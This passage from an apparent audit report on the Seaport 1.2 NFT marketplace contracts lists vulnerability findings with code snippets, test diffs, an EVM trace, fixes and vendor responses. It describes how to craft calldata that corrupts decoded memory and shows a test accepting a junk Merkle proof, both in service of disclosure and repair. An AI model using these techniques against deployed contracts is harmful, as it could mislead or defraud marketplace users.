Note: this also means that the fulfiller cannot explicitly provide the identifier when a contract order is being fulfilled. A malicious contract may use this to its advantage. For example, assume that a contract offerer in Seaport only accepts criteria-based offers. The fulfiller may first call previewOrder where the criteria is always resolved to a rare NFT, but the actual execution would return an uninteresting NFT. If such offers also required a corresponding resolver (similar behaviour to regular criteria-based orders), then this could be fixed by explicitly providing the identifier, akin to a slippage check. In short, for regular criteria-based orders with identifierOrCriteria = 0 the fulfiller can pick which identifier to receive by providing a CriteriaResolver (as long as it's valid). For contract orders, fulfillers don't have this option, and contracts may be able to abuse this.

Recommendation: An alternative approach to criteria-based contract orders would be to remove the extra case in _compareItems. Then contract offerers would have to return the same itemType and identifierOrCriteria when a generateOrder call is made. However, this means that the fulfiller will be able to choose the identifier it wants to receive. This may not be ideal in some cases, but it remains consistent with regular orders.

Seaport: We documented this deviation in PR 849.

Spearbit: Verified.

+5.1.4 Advanced orders of CONTRACT order type can generate orders with fewer consideration items, which would break the aggregation routine

Severity: Medium Risk

Context:
• OrderValidator.sol#L444-L447
• FulfillmentApplier.sol#L561-L569

Description: When Seaport gets a collection of advanced orders to fulfill or match, if one of the orders has a CONTRACT order type, Seaport calls the generateOrder(...) endpoint of that order's offerer. generateOrder(...) can provide fewer consideration items for this order.
So the total number of consideration items might be less than the one provided by the caller. But since the caller needs to provide the fulfillment data to Seaport beforehand, they might use indices that turn out to be out of range for the consideration in question after the modification applied for the contract offerer above. If this happens, the whole call reverts. This issue is in the same category as "Advanced orders of CONTRACT order type can generate orders with different consideration recipients, which would break the aggregation routine".

Recommendation: In order for the caller to be able to fulfill/match orders by figuring out how to aggregate and match different consideration and offer items, they would need access to all the data before calling into Seaport. Contract offerers are supposed to (it is not currently enforced) implement previewOrder, which the caller can use before making a call to Seaport. But there is no guarantee that the data returned by previewOrder and generateOrder for the same shared inputs would be the same. We can enforce that the contract offerer does not return fewer consideration items; if it needed to return fewer, it could either revert or provide a 0 amount. If the current conditions are going to stay the same, it is recommended to document this scenario and also provide more comments/documentation for ContractOffererInterface.

Seaport: Addressed in PR 842.

Spearbit: Verified.

+5.1.5 AdvancedOrder.numerator and AdvancedOrder.denominator are unchecked for orders of CONTRACT order type

Severity: Medium Risk

Context:
• OrderValidator.sol#L150-L153
• OrderCombiner.sol#L455-L463

Description: For most advanced order types, we have the following check:

    // Read numerator and denominator from memory and place on the stack.
    uint256 numerator = uint256(advancedOrder.numerator);
    uint256 denominator = uint256(advancedOrder.denominator);

    // Ensure that the supplied numerator and denominator are valid.
    if (numerator > denominator || numerator == 0) {
        _revertBadFraction();
    }

For CONTRACT order types this check is skipped. For later calculations (calculating the current amount), Seaport uses the numerator and denominator returned by _getGeneratedOrder, which as a pair is either (1, 1) or (0, 0). advancedOrder.numerator is only used to skip certain operations in some loops when it is 0:
• Skip applying criteria resolvers.
• Skip aggregating the amount for executions.
• Skip the final validity check.

Skipping the above operations would make sense. But when, for an advancedOrder with CONTRACT order type, _getGeneratedOrder returns (h, 1, 1) and advancedOrder.numerator == 0, we would skip applying criteria resolvers, skip aggregating the amounts from the offer or consideration amounts for this order, and skip the final validity check that would call into the ratifyOrder endpoint of the offerer. But emitting the following OrderFulfilled will not be skipped, even though this advancedOrder will not be used:

    // Emit an OrderFulfilled event.
    _emitOrderFulfilledEvent(
        orderHash,
        orderParameters.offerer,
        orderParameters.zone,
        recipient,
        orderParameters.offer,
        orderParameters.consideration
    );

This can create discrepancies between what happens on chain and what off-chain agents index/record.
Recommendation: Even though AdvancedOrder.numerator and AdvancedOrder.denominator are not really used for advanced orders of CONTRACT type, and AdvancedOrder.numerator is only used for signaling certain decisions in the call, it would be best to either hoist the checks regarding these parameters to an earlier point:

    // Read numerator and denominator from memory and place on the stack.
    uint256 numerator = uint256(advancedOrder.numerator);
    uint256 denominator = uint256(advancedOrder.denominator);

    // Ensure that the supplied numerator and denominator are valid.
    if (numerator > denominator || numerator == 0) {
        _revertBadFraction();
    }

    // If the order is a contract order, return the generated order.
    if (orderParameters.orderType == OrderType.CONTRACT) {
        // Return the generated order based on the order params and the
        // provided extra data. If revertOnInvalid is true, the function
        // will revert if the input is invalid.
        return _getGeneratedOrder(
            orderParameters,
            advancedOrder.extraData,
            revertOnInvalid
        );
    }

or, for orderParameters.orderType == OrderType.CONTRACT, enforce that advancedOrder.numerator == advancedOrder.denominator == 1.

Seaport: Fixed in PR 815.

Spearbit: Verified.

+5.1.6 Calls to PausableZone's executeMatchAdvancedOrders and executeMatchOrders would revert if unused native tokens would need to be returned

Severity: Medium Risk

Context:
• PausableZone.sol#L34
• PausableZone.sol#L149
• PausableZone.sol#L188
• OrderCombiner.sol#L704-L707

Description: In match (advanced) orders, one can provide native tokens as offer and consideration items, so a PausableZone would need to provide msg.value when calling the corresponding Seaport endpoints. There are a few scenarios where not all of the msg.value native token amount provided to the Seaport marketplace will be used:
1. Rounding errors in calculating the current amount of offer or consideration items. The zone can prevent sending extra native tokens to Seaport by pre-calculating these values and making sure its transaction is included in the specific block these values were calculated for (this is important when the start and end amount of an item are not equal).
2. The zone (un)intentionally sends more native tokens than necessary to Seaport.
3. The (advanced) orders sent for matching in Seaport include an order of CONTRACT order type, and the offerer contract provides a different amount for at least one item, eventually making the whole transaction not use the full msg.value provided to it.

In all these cases, since PausableZone does not have a receive or fallback endpoint to accept native tokens, the transaction may revert when Seaport tries to send back the unused native token amount.

PausableZone not accepting native tokens:

    $ export CODE=$(jq -r '.deployedBytecode' artifacts/contracts/zones/PausableZone.sol/PausableZone.json | tr -d '\n')
    $ evm --code $CODE --value 1 --prestate genesis.json --sender 0xb4d0000000000000000000000000000000000000 --nomemory=false --debug run
    $ evm --input $(echo $CODE | head -c 44 - | sed -E s/0x//) disasm
    6080806040526004908136101561001557600080fd
    00000: PUSH1 0x80
    00002: DUP1
    00003: PUSH1 0x40
    00005: MSTORE
    00006: PUSH1 0x04
    00008: SWAP1
    00009: DUP2
    0000a: CALLDATASIZE
    0000b: LT
    0000c: ISZERO
    0000d: PUSH2 0x0015
    00010: JUMPI
    00011: PUSH1 0x00
    00013: DUP1
    00014: REVERT

Trace of evm ... --debug run (error: execution reverted):

    #### TRACE ####
--debug run error: execution reverted #### TRACE #### PUSH1 pc=00000000 gas=4700000 cost=3 DUP1 pc=00000002 gas=4699997 cost=3 12 Stack: 00000000 0x80 PUSH1 Stack: 00000000 00000001 MSTORE Stack: 00000000 00000001 00000002 PUSH1 Stack: 00000000 Memory: 00000000 00000010 00000020 00000030 00000040 00000050 SWAP1 Stack: 00000000 00000001 Memory: 00000000 00000010 00000020 00000030 00000040 00000050 DUP2 Stack: 00000000 00000001 Memory: 00000000 00000010 00000020 00000030 00000040 00000050 pc=00000003 gas=4699994 cost=3 pc=00000005 gas=4699991 cost=12 pc=00000006 gas=4699979 cost=3 0x80 0x80 0x40 0x80 0x80 0x80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 80 |................| pc=00000008 gas=4699976 cost=3 0x4 0x80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 80 |................| pc=00000009 gas=4699973 cost=3 0x80 0x4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 80 |................| pc=00000010 gas=4699970 cost=2 0x4 0x80 0x4 CALLDATASIZE Stack: 00000000 00000001 00000002 Memory: 00000000 00000010 00000020 00000030 00000040 00000050 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 80 |................| 13 LT Stack: 00000000 00000001 00000002 00000003 Memory: 00000000 00000010 00000020 00000030 00000040 00000050 ISZERO Stack: 00000000 00000001 00000002 Memory: 00000000 00000010 00000020 00000030 00000040 00000050 PUSH2 Stack: 00000000 00000001 00000002 Memory: 00000000 00000010 00000020 00000030 00000040 00000050 JUMPI Stack: 00000000 00000001 00000002 00000003 Memory: 00000000 00000010 00000020 00000030 00000040 00000050 PUSH1 Stack: 00000000 00000001 Memory: 00000000 00000010 00000020 pc=00000011 gas=4699968 cost=3 0x0 0x4 0x80 0x4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 80 |................| pc=00000012 gas=4699965 cost=3 0x1 0x80 0x4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
    #### LOGS ####

genesis.json:

    {
      "gasLimit": "4700000",
      "difficulty": "1",
      "alloc": {
        "0xb4d0000000000000000000000000000000000000": {
          "balance": "10000000000000000000000000",
          "code": "",
          "storage": {}
        }
      }
    }

// file: test/zone.spec.ts
...
it("Fulfills an order with executeMatchAdvancedOrders with NATIVE Consideration Item", async () => { const pausableZoneControllerFactory = await ethers.getContractFactory( "PausableZoneController", owner ); const pausableZoneController = await pausableZoneControllerFactory.deploy( owner.address ); // Deploy pausable zone const zoneAddr = await createZone(pausableZoneController); 15 // Mint NFTs for use in orders const nftId = await mintAndApprove721(seller, marketplaceContract.address); // Define orders const offerOne = [ getTestItem721(nftId, toBN(1), toBN(1), undefined, testERC721.address), ]; const considerationOne = [ getOfferOrConsiderationItem( 0, ethers.constants.AddressZero, toBN(0), parseEther("0.01"), parseEther("0.01"), seller.address ), ]; const { order: orderOne, orderHash: orderHashOne } = await createOrder( seller, zoneAddr, offerOne, considerationOne, 2 ); const offerTwo = [ getOfferOrConsiderationItem( 0, ethers.constants.AddressZero, toBN(0), parseEther("0.01"), parseEther("0.01"), undefined ), ]; const considerationTwo = [ getTestItem721( nftId, toBN(1), toBN(1), buyer.address, testERC721.address ), ]; const { order: orderTwo, orderHash: orderHashTwo } = await createOrder( buyer, zoneAddr, offerTwo, considerationTwo, 2 ); const fulfillments = [ [[[0, 0]], [[1, 0]]], [[[1, 0]], [[0, 0]]], ].map(([offerArr, considerationArr]) => toFulfillment(offerArr, considerationArr) ); // Perform the match advanced orders with zone const tx = await pausableZoneController .connect(owner) 16 .executeMatchAdvancedOrders( zoneAddr, marketplaceContract.address, [orderOne, orderTwo], [], fulfillments, { value: parseEther("0.01").add(1) } // the extra 1 wei reverts the tx ); // Decode all events and get the order hashes const orderFulfilledEvents = await decodeEvents(tx, [ { eventName: "OrderFulfilled", contract: marketplaceContract }, ]); expect(orderFulfilledEvents.length).to.equal(fulfillments.length); // Check that the actual order hashes match those from the events, in order const actualOrderHashes = [orderHashOne, orderHashTwo]; orderFulfilledEvents.forEach((orderFulfilledEvent, i) => expect(orderFulfilledEvent.data.orderHash).to.be.equal( actualOrderHashes[i] ) ); }); ... This bug also applies to Seaport 1.1 and PausableZone (0x004C00500000aD104D7DBd00e3ae0A5C00560C00) Recommendation: It is really important for zones that are trying to match orders that would involve native tokens to be able to receive those tokens back from Seaport if all of them are not used. In case of Solidity contracts, one should define receive or fallback endpoints for these contracts (or the __default__ function if using Vyper). Seaport: Acknowledged. Spearbit: Acknowledged. +5.1.7 ABI decoding for bytes: memory can be corrupted by maliciously constructing the calldata Severity: Medium Risk Context: ConsiderationDecoder.sol#L51-L62 Description: In the code snippet below, size can be made 0 by maliciously crafting the calldata. In this case, the free memory is not incremented. assembly { mPtrLength := mload(0x40) let size := and( add( and(calldataload(cdPtrLength), OffsetOrLengthMask), AlmostTwoWords ), OnlyFullWordMask ) calldatacopy(mPtrLength, cdPtrLength, size) mstore(0x40, add(mPtrLength, size)) } This has two different consequences: 1. If the memory offset mPtrLength is immediately used then junk values at that memory location can be interpreted as the decoded bytes type. In the case of Seaport 1.2, the likelihood of the current free memory pointing to junk value is low. So, this case has low severity. 
2. The consequent memory allocation will also use the value mPtrLength to store data in memory. This can lead to corrupting the initial memory data. In the worst case, the next allocation can be tuned so that the first bytes data can be arbitrary data.

To make the size calculation return 0:

1. Find a function call which has bytes as a (nested) parameter.
2. Modify the calldata field where the length of the above bytes is stored to the new length 0xffffe0.
3. The calculation will now return size = 0.

Note: there is an additional requirement that this bytes type should be inside a dynamic struct. Otherwise, for example, in the case of function foo(bytes calldata signature), the compiler will insert a check that calldatasize is big enough to fit signature.length. Since the value 0xffffe0 is too big to fit into calldata, such an attack is impractical. However, for a bytes type inside a dynamic type, for example in function foo(bytes[] calldata signature), this check is skipped by solc (likely because it's expensive). For a practical exploit we need to look for such a function. In the case of Seaport 1.2 this could be the matchAdvancedOrders(AdvancedOrder[] calldata orders, ...) function. The struct AdvancedOrder has a nested parameter bytes signature as well as bytes extraData. In the above exploit one would be able to maliciously modify the calldata in such a way that Seaport would interpret the data in extraData as the signature.

Here is a proof of concept for a simplified case that showcases injecting an arbitrary value into a decoded bytes.

As for severity, even though interpreting calldata differently may not fundamentally break the protocol, an attacker with enough effort may be able to use this for subtle phishing attacks or as a precursor to other attacks.

Recommendation: Updating OnlyFullWordMask to 0xff_ff_ff_e0 will not fix this, as you can still replace len by 0xff_ff_ff_e0 and get the same effect. Also see The size calculation can be incorrect for large numbers.

Seaport: Fixed in PR 789.

Spearbit: Verified.

5.2 Low Risk

+5.2.1 Advanced orders of CONTRACT order types can generate orders with different consideration recipients that would break the aggregation routine

Severity: Low Risk

Context:

• ConsiderationDecoder.sol#L569-L574
• FulfillmentApplier.sol#L722-L736

Description: When Seaport receives a collection of advanced orders to match or fulfill, if one of the orders has a CONTRACT order type, Seaport calls the generateOrder(...) endpoint of that order's offerer. generateOrder(...) can provide new consideration item recipients for this order. These new recipients are going to be used for this order from this point on. In _getGeneratedOrder, there is no comparison between old and new consideration recipients.

The provided new recipients can create an issue when aggregating consideration items. Since the fulfillment data is provided beforehand by the caller of the Seaport endpoint, the caller might have provided fulfillment aggregation data that would have aggregated/combined one of the consideration items of this changed advanced order with another consideration item. But the aggregation had taken into consideration the original recipient of the order in question. Multiple consideration items can only be aggregated if they share the same itemType, token, identifier, and recipient (ref). The new recipients provided by the contract offerer can break this invariant and in turn cause a revert.
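The aggregation invariant at play can be sketched as follows. This is a simplified illustration with stand-in types, not Seaport's actual FulfillmentApplier code:

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.17;

// Simplified stand-ins for Seaport's types, for illustration only.
enum ItemType { NATIVE, ERC20, ERC721, ERC1155 }

struct ConsiderationItem {
    ItemType itemType;
    address token;
    uint256 identifierOrCriteria;
    uint256 amount;
    address payable recipient;
}

contract AggregationSketch {
    // Two consideration items may only be combined into one execution when
    // all four of these fields match. A contract offerer that returns a new
    // recipient from generateOrder(...) invalidates fulfillment data that
    // was built against the original recipient, and the aggregation reverts.
    function canAggregate(
        ConsiderationItem memory a,
        ConsiderationItem memory b
    ) public pure returns (bool) {
        return
            a.itemType == b.itemType &&
            a.token == b.token &&
            a.identifierOrCriteria == b.identifierOrCriteria &&
            a.recipient == b.recipient;
    }
}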
Recommendation: Either

• The original consideration item recipients would need to be shared with the contract offerer when generateOrder(...) is called, and they would stay the same for the new consideration items. This way the offerer can check these recipients and revert the call if needed. In this case, the caller of Seaport endpoints would need to somehow (perhaps using the previewOrder endpoint) get the recipients beforehand.
• Ensure that the old and new consideration recipients are the same.

Additionally, if changes are not applied, consider documenting this scenario for the users who call into Seaport or create custom offerer contracts. Adding more comments/documentation for the previewOrder and generateOrder endpoints is also recommended.

Seaport: Fixed in PR 824, which ensures that either the new recipient can be any address if the original was address(0), or the new and old consideration recipients have to match (otherwise the call would revert).

Spearbit: Verified.

+5.2.2 CriteriaResolvers.criteriaProof is not validated in the identifierOrCriteria == 0 case

Severity: Low Risk

Context: CriteriaResolution.sol#L199-L206

Description: In the case of identifierOrCriteria == 0, the criteria resolver completely skips any validation of the Merkle proof and, in particular, is missing the validation that CriteriaResolvers.criteriaProof.length == 0.

Note: This is also present in Seaport 1.1 and may be a known issue.

Proof of concept:

modified   test/advanced.spec.ts
@@ -3568,9 +3568,8 @@ describe(`Advanced orders (Seaport v${VERSION})`, function () {
       // Seller approves marketplace contract to transfer NFTs
       await set1155ApprovalForAll(seller, marketplaceContract.address, true);

-      const { root, proofs } = merkleTree([nftId]);
-      const offer = [getTestItem1155WithCriteria(root, toBN(1), toBN(1))];
+      const offer = [getTestItem1155WithCriteria(toBN(0), toBN(1), toBN(1))];

       const consideration = [
         getItemETH(parseEther("10"), parseEther("10"), seller.address),
@@ -3578,8 +3577,9 @@ describe(`Advanced orders (Seaport v${VERSION})`, function () {
         getItemETH(parseEther("1"), parseEther("1"), owner.address),
       ];

+      // Add a junk criteria proof and the test still passes
       const criteriaResolvers = [
-        buildResolver(0, 0, 0, nftId, proofs[nftId.toString()]),
+        buildResolver(0, 0, 0, nftId, ["0xdead000000000000000000000000000000000000000000000000000000000000"]),
       ];

       const { order, orderHash, value } = await createOrder(

Recommendation: Consider adding the following additional check:

modified   contracts/lib/CriteriaResolution.sol
@@ -203,6 +203,8 @@ contract CriteriaResolution is CriteriaResolutionErrors {
                     identifierOrCriteria,
                     criteriaResolver.criteriaProof
                 );
+            } else {
+                require(criteriaResolver.criteriaProof.length == 0);
             }

             // Update item type to remove criteria usage.

Seaport: Fixed in PR 825.

Spearbit: Verified.

+5.2.3 Calls to TypehashDirectory will be successful

Severity: Low Risk

Context:

• TypehashDirectory.sol#L119

Description: TypehashDirectory's deployed bytecode starts with 00, which corresponds to the STOP opcode (SSTORE2 also uses this pattern). This choice of first byte causes accidental calls to the contract to succeed silently.

Recommendation: Document the reason why STOP was used for the first opcode. If it is not necessary for STOP to be the first opcode, use an opcode that reverts calls to TypehashDirectory, as it is only used as a data storage contract.

Seaport: Fixed in PR 799.

Spearbit: Verified.
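As a minimal illustration of the silent success (a hypothetical caller contract, not Seaport code): a plain call to a contract whose runtime code begins with 0x00 executes STOP at the first program counter and returns success without doing anything.

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.17;

contract StopDemo {
    // Calling a data-storage contract such as TypehashDirectory, whose
    // runtime code starts with 0x00 (STOP), halts immediately and reports
    // success instead of reverting.
    function callDataContract(address dataContract) external returns (bool ok) {
        (ok, ) = dataContract.call("");
        // ok == true even though no function on the target ever ran.
    }
}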
+5.2.4 _isValidBulkOrderSize does not perform the signature length validation correctly.

Severity: Low Risk

Context:

• Verifiers.sol#L122-L125

Description: In _isValidBulkOrderSize the signature's length validation is performed as follows:

let length := mload(signature)
validLength := and(
    lt(length, BulkOrderProof_excessSize),
    lt(and(sub(length, BulkOrderProof_minSize), AlmostOneWord), 2)
)

The sub opcode in the above snippet wraps around. If this were the correct formula, it would actually simplify to:

lt(and(sub(length, 3), AlmostOneWord), 2)

The simplified and the current version would allow length to also be 3, 4, 35, 36, 67, 68, but _isValidBulkOrderSize actually needs to check that the length l has the following form:

l = (64 + x) + 3 + 32y

where x ∈ {0, 1} and y ∈ {1, 2, ..., 24} (y represents the height/depth of the bulk order).

Recommendation: Modify the assembly block to reflect the constraints needed for the above formula:

let z := sub(mload(signature), BulkOrderProof_minSize)
validLength := and(
    lt(z, 738), // 738 = (1 + 32 * 23) + 1, named constant BulkOrderProof_rangeSize
    lt(and(z, AlmostOneWord), 2)
)

• Verification:

lt(sub(length, 99), 738)

l - 99 = l - (64 + 3 + 32) = x + 32(y - 1) <= 1 + 32 * 23 = 737 < 738

This also takes care of underflows, and we end up with the condition l ∈ {99, 100, ..., 836}.

lt(and(add(length, 29), 31), 2)

(l + 0b11101) & 0b11111 ∈ {0, 1} translates into l + 29 ≡ 0, 1 (mod 32), i.e. l ≡ 3, 4 (mod 32), i.e. l - 99 ≡ 0, 1 (mod 32), which enforces l - 99 to be of the form x + 32y' where x ∈ {0, 1} and y' is a non-negative integer. From the first part we know that l - 99 ∈ {0, 1, ..., 737}, which restricts y' to {0, 1, ..., 23}. And so l = (64 + x) + 3 + 32(y' + 1) ∈ 67 + {0, 1} + 32 * {1, 2, ..., 24}.

Spearbit: The solution mentioned above might be cheaper than PR 797 (depends on the stack juggling by the compiler).

Seaport: Leaving it as-is for 1.2 as it's close either way.

Spearbit: Verified.

+5.2.5 When contractNonce occupies more than 12 bytes the truncated nonce shared back with the contract offerer through ratifyOrder would be smaller than the actual stored nonce

Severity: Low Risk

Context:

• ConsiderationEncoder.sol#L146
• OrderValidator.sol#L385-L387

Description: When contractNonce occupies more than 12 bytes, the truncated nonce shared back with the contract offerer through ratifyOrder would be smaller than the actual stored nonce:

// Write contractNonce to calldata
dstHead.offset(ratifyOrder_contractNonce_offset).write(
    uint96(uint256(orderHash))
);

This is due to the way the contractNonce and the offerer's address are mixed in the orderHash:

assembly {
    orderHash := or(contractNonce, shl(0x60, offerer))
}

Recommendation: One can avoid the truncation by using XOR when calculating the orderHash:

orderHash := xor(contractNonce, offerer)

and sending the full orderHash to the contract offerer's ratifyOrder endpoint:

dstHead.offset(ratifyOrder_contractNonce_offset).write(orderHash);

The contract offerer can recover the nonce by XORing its address with the received hash again:

nonce := xor(orderHash, address())

This would also make the calculations cheaper.

Seaport: Fixed in commit f82012.

Spearbit: Verified.
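A small sketch of both schemes (a hypothetical helper contract, not the Seaport implementation) shows the lossy cast next to the suggested XOR round-trip:

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.17;

contract NonceHashDemo {
    // Current scheme: orderHash = or(contractNonce, shl(0x60, offerer)).
    // Casting the hash to uint96 drops any nonce bits at or above bit 96,
    // so the value shared through ratifyOrder is lossy for large nonces.
    function truncatedNonce(uint256 contractNonce) public pure returns (uint96) {
        return uint96(contractNonce);
    }

    // Suggested scheme: orderHash = xor(contractNonce, offerer). The
    // offerer recovers the full nonce by XORing with its own address.
    function recoverNonce(bytes32 orderHash, address offerer)
        public
        pure
        returns (uint256 nonce)
    {
        nonce = uint256(orderHash) ^ uint256(uint160(offerer));
    }
}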
+5.2.6 abi_decode_bytes does not mask the copied data length

Severity: Low Risk

Context:

• ConsiderationDecoder.sol#L60

Description: When abi_decode_bytes decodes bytes, it does not mask the copied length of the data in memory (in other places the length is masked by OffsetOrLengthMask).

Recommendation: Make sure to also mask the copied length before saving it to memory.

Seaport: Fixed in PR 823.

Spearbit: Verified.

+5.2.7 OrderHash in the context of contract orders need not refer to a unique order

Severity: Low Risk

Context: OrderValidator.sol#L386

Description: In Seaport 1.1, and in Seaport 1.2 for non-contract orders, order hashes have a unique correspondence with the order, i.e., the hash can be used to identify the status of an order on-chain and track it. However, in the case of contract orders, this is not the case. The hash is simply the current nonce of the offerer, combined with the offerer's address. This cannot be used to uniquely track an order on-chain.

uint256 contractNonce;
unchecked {
    contractNonce = _contractNonces[offerer]++;
}
assembly {
    orderHash := or(contractNonce, shl(0x60, offerer))
}

Here are some example scenarios where this can be problematic:

Scenario 1: A reverted contract order and the adjacent succeeding contract order will have the same order hash, regardless of whether they correspond to the same order.

1. Consider Alice calling fulfillAdvancedOrder for a contract order with offerer = X, where X is a smart contract that offers contract orders on Seaport 1.2. Assume that this transaction failed because enough gas was not provided for the generateOrder call. This tx would revert with a custom error InvalidContractOrder, generated from OrderValidator.sol#L391.
2. Consider Bob calling fulfillAdvancedOrder for a different contract order with offerer = X, the same smart contract offerer. This order will succeed and emit the OrderFulfilled event from OrderFulfiller.sol#L124.

In the above scenario, there are two different orders, one that reverted on-chain and one that succeeded, both having the same orderHash despite the orders only sharing the same contract offerer--the other parameters can be completely arbitrary.

Scenario 2: Contract order hashes computed off-chain can be misleading.

1. Consider Alice calling fulfillAdvancedOrder for a contract order with offerer = X, where X is a smart contract that offers contract orders on Seaport 1.2. Alice computed the orderHash of their order off-chain by simulating the transaction, sends the transaction, and polls the OrderFulfilled event with the same orderHash to know if the order has been fulfilled.
2. Consider Bob calling fulfillAdvancedOrder for any contract order with offerer = X, the same smart contract offerer.
3. Bob's transaction gets included first. An OrderFulfilled event is emitted, with the orderHash being the same hash that Alice computed off-chain! Alice may believe that their order succeeded.

Note: for non-contract orders, the above approach would be valid, i.e., one may generate and sign an order, compute the order hash of the order off-chain, and poll for an OrderFulfilled event with that order hash to know that it was fulfilled.

Note: even though there is an easier way to track whether the order succeeded in these cases, in the general case Alice or Bob need not be the ones executing the orders on-chain. An off-chain agent may send misleading notifications to either party that their order succeeded due to this quirk with contract order hashes.

Recommendation:

1.
Consider computing the order hash for contract orders similarly to how regular orders are hashed.

2. If the same mechanism is maintained, document that using orderHashes as a unique identifier is not reliable.

Seaport: Acknowledged.

Spearbit: Acknowledged.

+5.2.8 When _contractNonces[offerer] gets updated no event is emitted

Severity: Low Risk

Context:

• OrderValidator.sol#L382
• CounterManager.sol#L54

Description: When _contractNonces[offerer] gets updated, no event is emitted. This is in contrast to when a counter is updated. One might be able to extract _contractNonces[offerer] (if it doesn't overflow 12 bytes and enter into the offerer region of the orderHash) from a later event when OrderFulfilled gets emitted. OrderFulfilled only gets emitted for an order of CONTRACT type if the generateOrder(...) return data satisfies all the constraints.

Recommendation: Emit a custom event when _contractNonces[offerer] gets updated if it is important for off-chain agents to monitor this value.

Seaport: Acknowledged.

Spearbit: Acknowledged.

+5.2.9 In general a contract offerer or a zone cannot accurately draw a conclusion based on the spent offer amounts or received consideration amounts shared with them post-transfer

Severity: Low Risk

Context:

• ContractOffererInterface.sol#L7
• ContractOffererInterface.sol#L16
• ZoneInterface.sol#L13
• ZoneInteraction.sol#L92

Description: When one calls one of the Seaport endpoints that fulfills or matches a collection of (advanced) orders, the used offer or consideration items go through different modification steps in memory. In particular, the startAmount a of these items is an important parameter to inspect:

a → a′ → b → a′

a: the original startAmount parameter shared with Seaport by the caller, encoded in memory.

a′: the interpolated value; for orders of CONTRACT order type it is the value returned by the contract offerer (interpolation has no effect in this case since startAmount and endAmount are enforced to be equal).

b: must be 0 for used consideration items, otherwise the call would revert. For offer items, it can be in [0, 1) (see The spent offer item amounts shared with a zone for restricted (advanced) orders or with a contract offerer for orders of CONTRACT order type is not the actual spent amount in general).

a′: the final amount shared by Seaport with either a zone for restricted orders or a contract offerer for CONTRACT order types.

• Offer Items

For offer items, perhaps the zone or the contract offerer would like to check that the offerer has spent a maximum of a′ of that specific offer item. For the case of restricted orders where the zone's validateOrder(...) will be called, the offerer might end up spending more than a′ of a specific token with the same identifier if the collection of orders includes:

• A mix of open and restricted orders.
• Multiple zones for the same offerer, offering the same token with the same identifier.
• Multiple orders using the same zone.

In this case, the zone might not have a sense of the order of the transfers, or of which orders are included in the transaction in question (unless the contexts used by the zone enforce the exact ordering and number of items that can be matched/fulfilled in the same transaction). Note that the order of transfers can be manipulated/engineered by constructing specific fulfillment data. Given fulfillment data to combine/aggregate orders, there can be permutations of it that create different orderings of the executions.
• An order with an actor (a consideration recipient, contract offerer, weird token, ...) that has approval to transfer this specific offer item for the offerer in question. When Seaport calls into this actor (NATIVE, ERC1155 token transfers, ...), the actor can transfer the token to a different address than the offerer.

There is also a special case where an order with the same offer item token and identifier is signed on a different instance of Seaport (1.0, 1.1, 1.2, ..., or other non-official versions) which an actor (a consideration recipient, contract offerer, weird token, ...) can cross-call into (see the related finding Cross-Seaport re-entrancy with the stateful validateOrder call).

The above issue can be avoided if the offerer makes sure not to sign different transactions, across different or the same instances of Seaport, which:

1. share the same offer type, offer token, and offer identifier,
2. but differ in a mix of zone and order type, and
3. can be active at a shared timestamp.

And/or the offerer does not give untrusted parties their token approvals.

A similar issue can arise for a contract offerer if they use a mix of signed orders of non-CONTRACT order type and CONTRACT order types.

• Consideration Items

For consideration items, perhaps the zone or the contract offerer would like to check that the recipient of each consideration item has received a minimum of a′ of that specific consideration item. This case is similar to the offer item issues above when a mix of orders has been used.

Recommendation: The above issues and notes should be documented for the users. Document the decision for the current zone and contract offerer interaction patterns.

Seaport: Acknowledged.

Spearbit: Acknowledged.

+5.2.10 Cross-Seaport re-entrancy with the stateful validateOrder call

Severity: Low Risk

Context: BasicOrderFulfiller.sol#L280

Description: The re-entrancy check in Seaport 1.2 will prevent the Zone from interacting with Seaport 1.2 again. However, an interesting scenario arises when the conduit has open channels to both Seaport 1.1 and Seaport 1.2 (or different deployments/forks of Seaport 1.2). This can lead to cross-Seaport re-entrancy. This is not immediately problematic, as Zones currently have limited functionality. But since Zones can be as flexible as possible, Zones need to be careful if they can interact with multiple versions of Seaport.

